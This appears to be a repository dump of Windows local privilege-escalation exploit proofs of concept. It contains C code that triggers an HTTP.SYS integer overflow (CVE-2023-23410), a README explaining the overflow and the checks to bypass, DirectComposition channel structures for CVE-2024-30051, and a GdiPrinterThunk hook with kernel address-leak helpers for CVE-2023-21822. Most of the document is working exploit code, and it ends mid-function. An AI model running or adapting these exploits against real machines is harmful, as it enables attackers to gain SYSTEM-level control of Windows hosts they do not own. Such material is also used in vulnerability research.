HTTPAPI_VERSION_2; 23 | HTTP_CHANNEL_BIND_INFO property; 24 | PHTTP_SERVICE_BINDING_A ptr[0x40]; 25 | 26 | ULONG status = HttpInitialize( 27 | HttpApiVersion, 28 | HTTP_INITIALIZE_SERVER, // Flags 29 | NULL // Reserved 30 | ); 31 | 32 | if (status != NO_ERROR) 33 | { 34 | wprintf(L"HttpInitialize(): failed with %lu \n", status); 35 | return status; 36 | } 37 | 38 | HTTP_SERVER_SESSION_ID sessionId = HTTP_NULL_ID; 39 | status = HttpCreateServerSession(HttpApiVersion, &sessionId, 0); 40 | HANDLE hReqQueue = NULL; 41 | status = HttpCreateRequestQueue(HttpApiVersion, 42 | L"MyQueue", 43 | NULL, 44 | 0, 45 | &hReqQueue); 46 | 47 | /* 48 | Compute params 49 | */ 50 | SIZE_T numberOfServiceNames = 0x40; 51 | 52 | SIZE_T szTotal = 0xffffffe8; 53 | SIZE_T szServiceNameHeader = 0x20; 54 | SIZE_T szTotalServiceNameHeaders = szTotal - numberOfServiceNames * szServiceNameHeader; 55 | SIZE_T szServiceName = szTotalServiceNameHeaders / 0x40; 56 | szServiceName = (szServiceName + 7) & ~7; 57 | SIZE_T reminder = (szServiceName + szServiceNameHeader) * 0x40 - szTotal; 58 | 59 | wprintf(L"[?] szTotal = 0x%llx\n", szTotal); 60 | wprintf(L"[?] szServiceNameHeader = 0x%llx\n", szServiceNameHeader); 61 | wprintf(L"[?] szTotalServiceNameHeaders = 0x%llx\n", szTotalServiceNameHeaders); 62 | wprintf(L"[?] szServiceName = 0x%llx\n", szServiceName); 63 | wprintf(L"[?] reminder = 0x%llx\n", reminder); 64 | 65 | /* 66 | Craft buffer 67 | */ 68 | unsigned char* buf = (unsigned char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, szTotal); 69 | 70 | for (size_t i = 0; i < numberOfServiceNames; i++) { 71 | PHTTP_SERVICE_BINDING_A p = (PHTTP_SERVICE_BINDING_A)&buf[i * (szServiceName + szServiceNameHeader)]; 72 | 73 | p->Base.Type = HttpServiceBindingTypeA; 74 | p->Buffer = (PCHAR) & buf[i * (szServiceName + szServiceNameHeader) + szServiceNameHeader]; 75 | p->BufferSize = szServiceName; 76 | 77 | ptr[i] = p; 78 | 79 | wprintf(L"[?] sn.buf = 0x%llx\n", p->Buffer); 80 | wprintf(L"[?] sn.szbuf = 0x%llx\n", p->BufferSize); 81 | wprintf(L"[?] sn[i] = 0x%llx\n", ptr[i]); 82 | } 83 | 84 | property.Hardening = HttpAuthenticationHardeningStrict; 85 | property.Flags = HTTP_CHANNEL_BIND_DOTLESS_SERVICE; 86 | property.NumberOfServiceNames = numberOfServiceNames; 87 | property.ServiceNames = (PHTTP_SERVICE_BINDING_BASE*)&ptr; 88 | 89 | status = HttpSetServerSessionProperty(sessionId, HttpServerChannelBindProperty, &property, sizeof(HTTP_CHANNEL_BIND_INFO)); 90 | if (status != NOERROR) { 91 | wprintf(L"HttpSetServerSessionProperty failed with %lu \n", status); 92 | return -2; 93 | } 94 | 95 | unsigned char out[0x820]; 96 | status = HttpQueryServerSessionProperty(sessionId, HttpServerChannelBindProperty, &out, sizeof(out), &ReturnLength); 97 | if (status != NOERROR) { 98 | wprintf(L"HttpQueryServerSessionProperty failed with %lu \n", status); 99 | return -3; 100 | } 101 | } 102 | -------------------------------------------------------------------------------- /cve-2023-23410/README.md: -------------------------------------------------------------------------------- 1 | 2 | # CVE-2023-2341 HTTP.SYS EoP 3 | 4 | > At least 4Gb of memory is required for PoC 5 | 6 | We can trigger an integer overflow in **UlpComputeChannelBindConfigSize** which can lead to memory corruption in **UlCopyChannelBindConfigToIrp**. Patch introduced a new check for size of *ServiceName*. That check prevents size to be greater than **0xFFFC**. 7 | 8 | An introduced check was placed in **UlCaptureChannelBindConfig**. 9 | ![printscreen of introduced check](img/1.png) 10 | 11 | That function can be reached by followed usermode **API** from **httpapi.dll**. 12 | 13 | - [HttpSetServerSessionProperty](https://learn.microsoft.com/en-us/windows/win32/api/http/nf-http-httpsetserversessionproperty) 14 | - [HttpSetUrlGroupProperty](https://learn.microsoft.com/en-us/windows/win32/api/http/nf-http-httpseturlgroupproperty) 15 | - [HttpSendHttpResponse](https://learn.microsoft.com/en-us/windows/win32/api/http/nf-http-httpsendhttpresponse) 16 | 17 | Memory layout of considered structures 18 | ![memorylayout](img/2.png) 19 | 20 | **UlpComputeChannelBindConfigSize** computes the total size of memory required for whole *ChannelBindConfig* structure. We can craft a specific sequence of *ServiceName* structures which can overflow **resultSize** variable. 21 | 22 | ![printscreen of UlpComputeChannelBindConfigSize code](img/3.png) 23 | 24 | But we should beware about few more check. 25 | 26 | - Check in **UlpAddServiceNameToContainer** which prevent size to be greater or equal than **0xffffffe8**. 27 | 28 | ![printscreen of UlpComputeChannelBindConfigSize code](img/4.png) 29 | 30 | - Size of ServiceName should be aligned to 8. 31 | 32 | ## Stack Trace 33 | 34 | ![printscreen of stack trace](img/5.jpg) 35 | 36 | ## Build 37 | 38 | ```shell 39 | cd cve-2023-23410 40 | cmake -S . -B build 41 | cmake --build build --config Release 42 | ``` 43 | 44 | ## Machine systeminfo 45 | 46 | ```shell 47 | Host Name: DESKTOP-19NG2CS 48 | OS Name: Microsoft Windows 10 Education 49 | OS Version: 10.0.19045 N/A Build 19045 50 | OS Manufacturer: Microsoft Corporation 51 | OS Configuration: Standalone Workstation 52 | OS Build Type: Multiprocessor Free 53 | Registered Owner: Windows User 54 | Registered Organization: 55 | Product ID: 00328-00000-00000-AA110 56 | Original Install Date: 27/03/2023, 14:36:49 57 | System Boot Time: 10/05/2023, 19:57:35 58 | System Manufacturer: VMware, Inc. 59 | System Model: VMware7,1 60 | System Type: x64-based PC 61 | Processor(s): 1 Processor(s) Installed. 62 | [01]: Intel64 Family 6 Model 165 Stepping 5 GenuineIntel ~3792 Mhz 63 | BIOS Version: VMware, Inc. VMW71.00V.16722896.B64.2008100651, 10/08/2020 64 | Windows Directory: C:\Windows 65 | System Directory: C:\Windows\system32 66 | Boot Device: \Device\HarddiskVolume1 67 | System Locale: en-gb;English (United Kingdom) 68 | Input Locale: en-gb;English (United Kingdom) 69 | Time Zone: (UTC+03:00) Kuwait, Riyadh 70 | Total Physical Memory: 4,095 MB 71 | Available Physical Memory: 1,666 MB 72 | Virtual Memory: Max Size: 8,191 MB 73 | Virtual Memory: Available: 6,180 MB 74 | Virtual Memory: In Use: 2,011 MB 75 | Page File Location(s): C:\pagefile.sys 76 | Domain: WORKGROUP 77 | Logon Server: \\DESKTOP-19NG2CS 78 | Hotfix(s): 6 Hotfix(s) Installed. 79 | [01]: KB5017022 80 | [02]: KB5015684 81 | [03]: KB5022834 82 | [04]: KB5014032 83 | [05]: KB5016705 84 | [06]: KB5020372 85 | Network Card(s): 1 NIC(s) Installed. 86 | [01]: Bluetooth Device (Personal Area Network) 87 | Connection Name: Bluetooth Network Connection 88 | Status: Media disconnected 89 | Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. 90 | ``` 91 | -------------------------------------------------------------------------------- /cve-2024-30051/src/dcomp.h: -------------------------------------------------------------------------------- 1 | #ifndef DCOMP_H_ 2 | #define DCOMP_H_ 3 | 4 | #include 5 | 6 | #include "ponylib/win32u.h" 7 | #include "ponylib/memory.h" 8 | #include "ponylib/nt.h" 9 | 10 | enum class dcomp_command_id_t: UINT32 { 11 | ProcessCommandBufferIterator=0, 12 | CreateResource=1, 13 | OpenSharedResource=2, 14 | ReleaseResource=3, 15 | GetAnimationTime=4, 16 | CapturePointer=5, 17 | OpenSharedResourceHandle=6, 18 | SetResourceCallbackId=7, 19 | SetResourceIntegerProperty=8, 20 | SetResourceFloatProperty=9, 21 | SetResourceHandleProperty=10, 22 | SetResourceHandleArrayProperty=11, 23 | SetResourceBufferProperty=12, 24 | SetResourceReferenceProperty=13, 25 | SetResourceReferenceArrayProperty=14, 26 | SetResourceAnimationProperty=15, 27 | SetResourceDeletedNotificationTag=16, 28 | AddVisualChild=17, 29 | RedirectMouseToHwnd=18, 30 | SetVisualInputSink=19, 31 | RemoveVisualChild=20 32 | }; 33 | 34 | #pragma pack(push, 1) 35 | struct dcomp_command_t { 36 | UINT32 Id; 37 | }; 38 | struct dcomp_command_create_resource_t { 39 | UINT32 Id; 40 | UINT32 Index; 41 | UINT32 TypeId; 42 | UINT32 Shared; 43 | }; 44 | struct dcomp_command_open_shared_resource_t { 45 | UINT32 Id; 46 | UINT32 Index; 47 | UINT64 Handle; 48 | UINT32 TypeId; 49 | UINT32 Reserved1; 50 | }; 51 | struct dcomp_command_release_resource_t { 52 | UINT32 Id; 53 | UINT32 Index; 54 | }; 55 | struct dcomp_command_get_animation_time_t { 56 | UINT32 Id; 57 | UINT32 Index; 58 | UINT64 Previous; 59 | UINT64 Delta; 60 | }; 61 | struct dcomp_command_capture_pointer_t { 62 | UINT32 Id; 63 | UINT32 Index; 64 | UINT32 Unknown_0_1; 65 | UINT32 PointerId; 66 | UINT64 Unknown_Stored_Value; 67 | }; 68 | struct dcomp_command_open_shared_resource_handle_t { 69 | UINT32 Id; 70 | UINT32 Index; 71 | UINT64 Unknown; 72 | }; 73 | struct dcomp_command_set_resource_callback_id_t { 74 | UINT32 Id; 75 | UINT32 Index; 76 | UINT32 CallbackId; 77 | }; 78 | struct dcomp_command_set_resource_integer_property_t { 79 | UINT32 Id; 80 | UINT32 Index; 81 | UINT64 PropertyId; 82 | UINT64 PropertyValue; 83 | }; 84 | struct dcomp_command_set_resource_float_property_t { 85 | UINT32 Id; 86 | UINT32 Index; 87 | UINT32 PropertyId; 88 | FLOAT PropertyValue; 89 | }; 90 | struct dcomp_command_set_resource_handle_property_t { 91 | UINT32 Id; 92 | UINT32 Index; 93 | UINT64 PropertyId; 94 | UINT64 PropertyValue; 95 | }; 96 | struct dcomp_command_set_resource_handle_array_property_t { 97 | UINT32 Id; 98 | UINT32 Index; 99 | UINT32 PropertyId; 100 | UINT32 ArraySize; 101 | UINT64 Array[1]; 102 | }; 103 | struct dcomp_command_set_resource_buffer_property_t { 104 | UINT32 Id; 105 | UINT32 Index; 106 | UINT32 PropertyId; 107 | UINT32 ArraySize; 108 | UINT8 Array[1]; 109 | }; 110 | struct dcomp_command_set_resource_reference_property_t { 111 | UINT32 Id; 112 | UINT32 Index; 113 | UINT32 PropertyId; 114 | UINT32 PropertyValue; 115 | }; 116 | struct dcomp_command_set_resource_reference_array_property_t { 117 | UINT32 Id; 118 | UINT32 Index; 119 | UINT32 PropertyId; 120 | UINT32 ArraySize; 121 | UINT32 Array[1]; 122 | }; 123 | struct dcomp_command_add_visual_child_t { 124 | UINT32 Id; 125 | UINT32 Index; 126 | UINT32 IndexChild; 127 | UINT32 Mode; 128 | UINT32 AdditionalIndex; 129 | }; 130 | #pragma pack(pop) 131 | 132 | class dcomp_channel_t { 133 | protected: 134 | HANDLE m_hch = NULL; 135 | SIZE_T m_size = NULL; 136 | PVOID m_mapped = NULL; 137 | 138 | ponylib::memory::memory_stream_t m_stream; 139 | 140 | int m_ctr; 141 | int m_error; 142 | 143 | public: 144 | dcomp_channel_t(SIZE_T size); 145 | ~dcomp_channel_t(); 146 | 147 | bool ok() const { 148 | return NT_SUCCESS(m_error); 149 | }; 150 | 151 | int error() const { 152 | return m_error; 153 | } 154 | 155 | HANDLE hch() const { 156 | return m_hch; 157 | } 158 | 159 | int nextIndex() { 160 | return m_ctr++; 161 | } 162 | 163 | bool createResource( UINT32 dwTypeId, UINT32 dwIndex, UINT32 dwShared); 164 | bool openSharedResource( UINT32 dwIndex, UINT64 dwHandle, UINT32 dwTypeId, UINT32 dwReserved1); 165 | bool setIntegerProperty( UINT32 dwIndex, UINT64 dqPropertyId, UINT64 dqPropertyValue); 166 | bool setFloatProperty( UINT32 dwIndex, UINT32 dwPropertyId, FLOAT dwPropertyValue); 167 | bool setReferenceProperty( UINT32 dwIndex, UINT32 dwPropertyId, UINT32 dwPropertyValue); 168 | bool setBufferProperty( UINT32 dwIndex, UINT32 dqPropertyId, PVOID buffer, SIZE_T size); 169 | bool setReferenceArrayProperty( UINT32 dwIndex, UINT32 dqPropertyId, UINT32 dwIndice[], SIZE_T szIndices); 170 | bool addVisualChild( UINT32 dwIndex, UINT32 dwIndexChild, UINT32 dwMode, UINT32 dwAdditionalIndex); 171 | bool releaseResource( UINT32 dwIndex); 172 | 173 | bool commit(); 174 | bool process(); 175 | bool apply(); 176 | }; 177 | 178 | class dcomp_shared_section_t { 179 | protected: 180 | HANDLE m_hSection; 181 | PVOID m_pMapped; 182 | SIZE_T m_size; 183 | UINT32 m_index; 184 | UINT32 m_typeId; 185 | 186 | dcomp_channel_t* m_ch; 187 | 188 | int m_error = 0; 189 | public: 190 | dcomp_shared_section_t( dcomp_channel_t* pch, UINT32 dwIndex, UINT32 dwTypeId, SIZE_T size ); 191 | ~dcomp_shared_section_t(); 192 | 193 | bool ok() const { 194 | return NT_SUCCESS(m_error); 195 | }; 196 | 197 | int error() const { 198 | return m_error; 199 | } 200 | 201 | PVOID base() const { 202 | return m_pMapped; 203 | }; 204 | SIZE_T size() const { 205 | return m_size; 206 | }; 207 | HANDLE handle() const { 208 | return m_hSection; 209 | }; 210 | UINT32 index() const { 211 | return m_index; 212 | }; 213 | UINT32 typeId() const { 214 | return m_typeId; 215 | } 216 | }; 217 | 218 | #endif // DCOMP_H_ -------------------------------------------------------------------------------- /cve-2023-21822/umpd.cpp: -------------------------------------------------------------------------------- 1 | #include "umpd.h" 2 | 3 | #include 4 | 5 | #define NUMBER_UMPD_OF_CALLBACKS 256 6 | 7 | typedef struct _UMPD_GDI_HOOK_INFO { 8 | FuncTy_GdiPrinterThunk_ pfnOrig; 9 | 10 | PULONG64 ptrOrigMem; 11 | 12 | FuncTy_GdiPrinterThunk_ pfnUmpdCallbackBefore[NUMBER_UMPD_OF_CALLBACKS] = {0}; 13 | FuncTy_GdiPrinterThunk_ pfnUmpdCallbackAfter[NUMBER_UMPD_OF_CALLBACKS] = {0}; 14 | 15 | BOOL bCallOrigTable[NUMBER_UMPD_OF_CALLBACKS] = {TRUE}; 16 | 17 | } UMPD_GDI_HOOK_INFO,*PUMPD_GDI_HOOK_INFO; 18 | 19 | static UMPD_GDI_HOOK_INFO g_umpd_hook_info; 20 | 21 | 22 | BOOL util_hook_iat_in_module( 23 | HMODULE hModule, 24 | HMODULE hModuleTarget, 25 | FARPROC pfnTarget, 26 | ULONG64 pfnHook, 27 | ULONG64& pfnOrig, 28 | PULONG64& ptrOrig 29 | ) { 30 | 31 | PBYTE base = (PBYTE)hModule; 32 | 33 | PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)(hModule); 34 | PIMAGE_NT_HEADERS fh = (PIMAGE_NT_HEADERS)(base + dos->e_lfanew); 35 | IMAGE_OPTIONAL_HEADER64 opt = fh->OptionalHeader; 36 | IMAGE_DATA_DIRECTORY dir = opt.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; 37 | PIMAGE_IMPORT_DESCRIPTOR descs = (PIMAGE_IMPORT_DESCRIPTOR)(dir.VirtualAddress + base); 38 | 39 | BOOL bFound = FALSE; 40 | int i = 0; 41 | 42 | while (descs[i].Characteristics != 0) { 43 | PIMAGE_IMPORT_DESCRIPTOR importDesc = &descs[i]; 44 | 45 | HMODULE hImportedLib = LoadLibraryA( 46 | (char *)(importDesc->Name + base) 47 | ); 48 | if (hImportedLib != hModuleTarget) { 49 | i++; 50 | continue; 51 | } 52 | 53 | PIMAGE_THUNK_DATA64 nameTable = (PIMAGE_THUNK_DATA64)(importDesc->OriginalFirstThunk + base); 54 | PIMAGE_THUNK_DATA64 addrTable = (PIMAGE_THUNK_DATA64)(importDesc->FirstThunk + base); 55 | 56 | int j = 0; 57 | while (nameTable[j].u1.AddressOfData != 0 ) { 58 | PIMAGE_THUNK_DATA64 nameDesc = &nameTable[j]; 59 | PIMAGE_THUNK_DATA64 addrDesc = &addrTable[j]; 60 | 61 | BOOL bImportedByOrdinal = (nameDesc->u1.Ordinal & IMAGE_ORDINAL_FLAG) == IMAGE_ORDINAL_FLAG; 62 | if (bImportedByOrdinal) { 63 | j++; 64 | continue; 65 | } 66 | 67 | 68 | PIMAGE_IMPORT_BY_NAME importedFuncName = (PIMAGE_IMPORT_BY_NAME)(nameDesc->u1.AddressOfData + base); 69 | FARPROC importedFunc = GetProcAddress(hImportedLib, (char*)(&importedFuncName->Name)); 70 | 71 | if (importedFunc != pfnTarget) { 72 | j++; 73 | continue; 74 | } 75 | 76 | ptrOrig = &addrDesc->u1.Function; 77 | DWORD protectFlags = NULL; 78 | 79 | VirtualProtect(ptrOrig, sizeof(ULONG64), PAGE_READWRITE, &protectFlags); 80 | pfnOrig = *ptrOrig; 81 | *ptrOrig = pfnHook; 82 | VirtualProtect(ptrOrig, sizeof(ULONG64), protectFlags, &protectFlags); 83 | 84 | bFound = TRUE; 85 | break; 86 | } 87 | 88 | break; 89 | } 90 | 91 | return bFound; 92 | }; 93 | 94 | 95 | BOOL umpd_load_printer_dll(LPWSTR printerName, HANDLE& hPrinter, LPWSTR& pDriverPath, HMODULE& hPrinterDLL) { 96 | hPrinter = NULL; 97 | pDriverPath = NULL; 98 | 99 | if (!OpenPrinterW(printerName, &hPrinter, NULL)) { 100 | return FALSE; 101 | } 102 | 103 | DWORD pcbNeeded; 104 | GetPrinterDriverW(hPrinter, NULL, 2, NULL, 0, &pcbNeeded); 105 | DRIVER_INFO_2W* driverInfo = (DRIVER_INFO_2W*)malloc(pcbNeeded); 106 | if (!GetPrinterDriverW(hPrinter, NULL, 2, (LPBYTE)driverInfo, pcbNeeded, &pcbNeeded)) { 107 | ClosePrinter(hPrinter); 108 | 109 | return FALSE; 110 | } 111 | pDriverPath = driverInfo->pDriverPath; 112 | hPrinterDLL = LoadLibraryExW(driverInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH); 113 | 114 | return TRUE; 115 | }; 116 | 117 | 118 | INT umpd_gdi_think_hook(VOID *inputBuf, ULONGLONG inputBufSize, VOID *outputBuffer, ULONGLONG outputBufSize) { 119 | ptr_My_UMPDTHDR umpdthdr = (ptr_My_UMPDTHDR)inputBuf; 120 | 121 | wprintf( 122 | L"[?][umpd_gdi_think_hook] in=%p out=%p szout=%llx cjSize=%x ulType=%d ulReserved1=%x ulReserved2=%x humpd=%llx\n", 123 | inputBuf, 124 | outputBuffer, 125 | outputBufSize, 126 | umpdthdr->umthdr.cjSize, 127 | umpdthdr->umthdr.ulType, 128 | umpdthdr->umthdr.ulReserved1, 129 | umpdthdr->umthdr.ulReserved2, 130 | umpdthdr->humpd 131 | ); 132 | 133 | INT result = TRUE; 134 | 135 | if (g_umpd_hook_info.pfnUmpdCallbackBefore[umpdthdr->umthdr.ulType]) { 136 | result = g_umpd_hook_info.pfnUmpdCallbackBefore[umpdthdr->umthdr.ulType]( 137 | inputBuf, inputBufSize, outputBuffer, outputBufSize 138 | ); 139 | } 140 | 141 | if (g_umpd_hook_info.bCallOrigTable[umpdthdr->umthdr.ulType]) { 142 | result = g_umpd_hook_info.pfnOrig( 143 | inputBuf, inputBufSize, outputBuffer, outputBufSize 144 | ); 145 | } 146 | 147 | if (g_umpd_hook_info.pfnUmpdCallbackAfter[umpdthdr->umthdr.ulType]) { 148 | result = g_umpd_hook_info.pfnUmpdCallbackAfter[umpdthdr->umthdr.ulType]( 149 | inputBuf, inputBufSize, outputBuffer, outputBufSize 150 | ); 151 | } 152 | 153 | return result; 154 | } 155 | 156 | BOOL umpd_set_gdi_hooks() { 157 | HMODULE hgdi = LoadLibraryW(L"gdi32.dll"); 158 | HMODULE hu32 = LoadLibraryW(L"user32.dll"); 159 | if (!hgdi || !hu32) 160 | return FALSE; 161 | 162 | BOOL status = util_hook_iat_in_module( 163 | hu32, 164 | hgdi, 165 | GetProcAddress(hgdi, "GdiPrinterThunk"), 166 | (ULONG64)&umpd_gdi_think_hook, 167 | (ULONG64&)g_umpd_hook_info.pfnOrig, 168 | g_umpd_hook_info.ptrOrigMem 169 | ); 170 | 171 | memset(&g_umpd_hook_info.bCallOrigTable, TRUE, 256 * sizeof(BOOL)); 172 | return status; 173 | }; 174 | 175 | VOID umpd_set_cb(INT index, FuncTy_GdiPrinterThunk_ cb, BOOL bBefore, BOOL bCallOrig) { 176 | if (bBefore) 177 | g_umpd_hook_info.pfnUmpdCallbackBefore[index] = cb; 178 | else 179 | g_umpd_hook_info.pfnUmpdCallbackAfter[index] = cb; 180 | 181 | g_umpd_hook_info.bCallOrigTable[index] = bCallOrig; 182 | } -------------------------------------------------------------------------------- /cve-2023-21822/nt.h: -------------------------------------------------------------------------------- 1 | #ifndef _NTHELPER 2 | #define _NTHELPER 3 | 4 | #include 5 | #include 6 | 7 | #define STATUS_INFO_LENGTH_MISMATCH 0xc0000004 8 | 9 | typedef enum _My_SYSTEM_INFORMATION_CLASS { 10 | MySystemBasicInformation, 11 | MySystemProcessorInformation, 12 | MySystemPerformanceInformation, 13 | MySystemTimeOfDayInformation, 14 | MySystemPathInformation, 15 | MySystemProcessInformation, 16 | MySystemCallCountInformation, 17 | MySystemDeviceInformation, 18 | MySystemProcessorPerformanceInformation, 19 | MySystemFlagsInformation, 20 | MySystemCallTimeInformation, 21 | MySystemModuleInformation, 22 | MySystemLocksInformation, 23 | MySystemStackTraceInformation, 24 | MySystemPagedPoolInformation, 25 | MySystemNonPagedPoolInformation, 26 | MySystemHandleInformation, 27 | MySystemObjectInformation, 28 | MySystemPageFileInformation, 29 | MySystemVdmInstemulInformation, 30 | MySystemVdmBopInformation, 31 | MySystemFileCacheInformation, 32 | MySystemPoolTagInformation, 33 | MySystemInterruptInformation, 34 | MySystemDpcBehaviorInformation, 35 | MySystemFullMemoryInformation, 36 | MySystemLoadGdiDriverInformation, 37 | MySystemUnloadGdiDriverInformation, 38 | MySystemTimeAdjustmentInformation, 39 | MySystemSummaryMemoryInformation, 40 | MySystemNextEventIdInformation, 41 | MySystemEventIdsInformation, 42 | MySystemCrashDumpInformation, 43 | MySystemExceptionInformation, 44 | MySystemCrashDumpStateInformation, 45 | MySystemKernelDebuggerInformation, 46 | MySystemContextSwitchInformation, 47 | MySystemRegistryQuotaInformation, 48 | MySystemExtendServiceTableInformation, 49 | MySystemPrioritySeperation, 50 | MySystemPlugPlayBusInformation, 51 | MySystemDockInformation, 52 | MySystemPowerInformation, 53 | MySystemProcessorSpeedInformation, 54 | MySystemCurrentTimeZoneInformation, 55 | MySystemLookasideInformation, 56 | MySystemExtendedHandleInformation = 64 57 | } My_SYSTEM_INFORMATION_CLASS, *ptr_My_SYSTEM_INFORMATION_CLASS; 58 | 59 | #define MAXIMUM_FILENAME_LENGTH 255 60 | 61 | typedef struct _My_SYSTEM_MODULE { 62 | ULONG Reserved1; 63 | ULONG Reserved2; 64 | #ifdef _WIN64 65 | ULONG Reserved3; 66 | #endif 67 | PVOID ImageBaseAddress; 68 | ULONG ImageSize; 69 | ULONG Flags; 70 | WORD Id; 71 | WORD Rank; 72 | WORD w018; 73 | WORD NameOffset; 74 | CHAR Name[MAXIMUM_FILENAME_LENGTH]; 75 | }My_SYSTEM_MODULE, *ptr_My_SYSTEM_MODULE; 76 | 77 | typedef struct _My_SYSTEM_MODULE_INFORMATION { 78 | ULONG ModulesCount; 79 | My_SYSTEM_MODULE Modules[1]; 80 | } My_SYSTEM_MODULE_INFORMATION, *ptr_My_SYSTEM_MODULE_INFORMATION; 81 | 82 | typedef struct _My_SYSTEM_HANDLE 83 | { 84 | PVOID Object; 85 | HANDLE UniqueProcessId; 86 | HANDLE HandleValue; 87 | ULONG GrantedAccess; 88 | USHORT CreatorBackTraceIndex; 89 | USHORT ObjectTypeIndex; 90 | ULONG HandleAttributes; 91 | ULONG Reserved; 92 | } My_SYSTEM_HANDLE, *ptr_My_SYSTEM_HANDLE; 93 | 94 | typedef struct _My_SYSTEM_HANDLE_INFORMATION 95 | { 96 | ULONG_PTR HandleCount; 97 | ULONG_PTR Reserved; 98 | My_SYSTEM_HANDLE Handles[1]; 99 | } My_SYSTEM_HANDLE_INFORMATION, *ptr_My_SYSTEM_HANDLE_INFORMATION; 100 | 101 | typedef NTSTATUS (NTAPI* FuncTy_NtQuerySystemInformation) ( 102 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 103 | PVOID SystemInformation, 104 | ULONG SystemInformationLength, 105 | ULONG *ReturnLength 106 | ); 107 | FuncTy_NtQuerySystemInformation g_pfnNtQuerySystemInformation = NULL; 108 | 109 | NTSTATUS NTAPI My_NtQuerySystemInformation( 110 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 111 | PVOID SystemInformation, 112 | ULONG SystemInformationLength, 113 | ULONG *ReturnLength 114 | ) 115 | { 116 | if (g_pfnNtQuerySystemInformation == NULL) { 117 | g_pfnNtQuerySystemInformation = (FuncTy_NtQuerySystemInformation)GetProcAddress( 118 | LoadLibraryW(L"ntdll.dll"), "NtQuerySystemInformation" 119 | ); 120 | } 121 | 122 | return g_pfnNtQuerySystemInformation( 123 | SystemInformationClass, 124 | SystemInformation, 125 | SystemInformationLength, 126 | ReturnLength 127 | ); 128 | }; 129 | 130 | NTSTATUS GetHandlesInfo(ptr_My_SYSTEM_HANDLE_INFORMATION* ppInfo) { 131 | *ppInfo = NULL; 132 | 133 | SIZE_T szInfo = 0x10000; 134 | ptr_My_SYSTEM_HANDLE_INFORMATION lpInfo = (ptr_My_SYSTEM_HANDLE_INFORMATION)VirtualAlloc(NULL, szInfo, MEM_COMMIT, PAGE_READWRITE); 135 | 136 | NTSTATUS status = My_NtQuerySystemInformation( 137 | (SYSTEM_INFORMATION_CLASS)MySystemExtendedHandleInformation,lpInfo,szInfo,NULL); 138 | 139 | while (status == STATUS_INFO_LENGTH_MISMATCH) { 140 | 141 | VirtualFree(lpInfo, szInfo, MEM_DECOMMIT); 142 | 143 | szInfo *= 4; 144 | lpInfo = (ptr_My_SYSTEM_HANDLE_INFORMATION)VirtualAlloc( 145 | NULL, szInfo, MEM_COMMIT, PAGE_READWRITE); 146 | 147 | status = My_NtQuerySystemInformation( 148 | (SYSTEM_INFORMATION_CLASS)MySystemExtendedHandleInformation, lpInfo, szInfo, NULL 149 | ); 150 | if (NT_SUCCESS(status)) 151 | break; 152 | } 153 | 154 | if (NT_SUCCESS(status)) 155 | *ppInfo = lpInfo; 156 | 157 | return status; 158 | } 159 | 160 | NTSTATUS GetModulesInfo(ptr_My_SYSTEM_MODULE_INFORMATION* ppInfo) { 161 | *ppInfo = NULL; 162 | 163 | SIZE_T szInfo = 0x10000; 164 | 165 | ptr_My_SYSTEM_MODULE_INFORMATION lpInfo = (ptr_My_SYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, szInfo, MEM_COMMIT, PAGE_READWRITE); 166 | 167 | NTSTATUS status = My_NtQuerySystemInformation( 168 | (SYSTEM_INFORMATION_CLASS)MySystemModuleInformation,lpInfo,szInfo,NULL); 169 | 170 | while (status == STATUS_INFO_LENGTH_MISMATCH) { 171 | 172 | VirtualFree(lpInfo, szInfo, MEM_DECOMMIT); 173 | 174 | szInfo *= 4; 175 | lpInfo = (ptr_My_SYSTEM_MODULE_INFORMATION)VirtualAlloc( 176 | NULL, szInfo, MEM_COMMIT, PAGE_READWRITE); 177 | 178 | status = My_NtQuerySystemInformation( 179 | (SYSTEM_INFORMATION_CLASS)MySystemModuleInformation, lpInfo, szInfo, NULL 180 | ); 181 | if (NT_SUCCESS(status)) 182 | break; 183 | } 184 | 185 | if (NT_SUCCESS(status)) 186 | *ppInfo = lpInfo; 187 | 188 | return status; 189 | }; 190 | 191 | #endif // _NTHELPER -------------------------------------------------------------------------------- /cve-2024-30051/src/dcomp.cpp: -------------------------------------------------------------------------------- 1 | #include "dcomp.h" 2 | 3 | 4 | dcomp_channel_t::dcomp_channel_t(SIZE_T size): m_size(size), m_error(0), m_ctr(1) { 5 | auto ntstatus = (*ponylib::win32u::kNtDCompositionCreateChannel)(&m_hch, &m_size, &m_mapped); 6 | if (!NT_SUCCESS(ntstatus)) { 7 | m_error = ntstatus; 8 | return; 9 | } 10 | m_stream = ponylib::memory::memory_stream_t(m_mapped, m_size); 11 | } 12 | dcomp_channel_t::~dcomp_channel_t() { 13 | (*ponylib::win32u::kNtDCompositionDestroyChannel)(m_hch); 14 | } 15 | bool dcomp_channel_t::createResource(UINT32 dwTypeId, UINT32 dwIndex, UINT32 dwShared) { 16 | dcomp_command_create_resource_t cmd = {0, 0, 0, 0}; 17 | 18 | cmd.Id = (UINT32)dcomp_command_id_t::CreateResource; 19 | cmd.Index = dwIndex; 20 | cmd.TypeId = dwTypeId; 21 | cmd.Shared = dwShared; 22 | 23 | return m_stream.write(std::move(cmd)); 24 | }; 25 | bool dcomp_channel_t::openSharedResource(UINT32 dwIndex, UINT64 dwHandle, UINT32 dwTypeId, UINT32 dwReserved1) { 26 | dcomp_command_open_shared_resource_t cmd = {0, 0, 0, 0, 0}; 27 | 28 | cmd.Id = (UINT32)dcomp_command_id_t::OpenSharedResource; 29 | cmd.Index = dwIndex; 30 | cmd.TypeId = dwTypeId; 31 | cmd.Handle = dwHandle; 32 | cmd.Reserved1 = dwReserved1; 33 | 34 | return m_stream.write(std::move(cmd)); 35 | }; 36 | bool dcomp_channel_t::setIntegerProperty(UINT32 dwIndex, UINT64 dqPropertyId, UINT64 dqPropertyValue) { 37 | dcomp_command_set_resource_integer_property_t cmd = {0 ,0, 0, 0}; 38 | 39 | cmd.Id = (UINT32)dcomp_command_id_t::SetResourceIntegerProperty; 40 | cmd.Index = dwIndex; 41 | cmd.PropertyId = dqPropertyId; 42 | cmd.PropertyValue = dqPropertyValue; 43 | 44 | return 